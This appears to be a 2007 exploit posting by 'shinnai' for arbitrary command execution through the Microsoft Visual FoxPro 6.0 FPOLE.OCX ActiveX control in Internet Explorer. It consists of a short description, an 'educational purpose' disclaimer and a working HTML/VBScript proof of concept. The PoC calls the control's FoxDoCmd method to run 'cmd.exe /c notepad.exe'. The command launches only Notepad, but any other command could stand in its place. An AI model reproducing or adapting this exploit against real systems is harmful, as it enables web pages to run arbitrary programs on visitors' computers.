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Posted on 10 October 2007

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution</b> url: http://www.microsoft.com Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> <b>Technical Details File: FPOLE.OCX Version: 6.0.8450.0 MD5: E9A1D8CFE6C791BA76B7343FA39752FB Marked as: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller</b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 When I released this <a href='http://www.milw0rm.com/exploits/4369'>http://www.milw0rm.com/exploits/4369</a> I never thought it was possible to use the "FoxDoCmd()" method to run applications passed as argument but... ----------------------------------------------------------------------------- <object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something" End Sub </script> </span></span> </code></pre>

 

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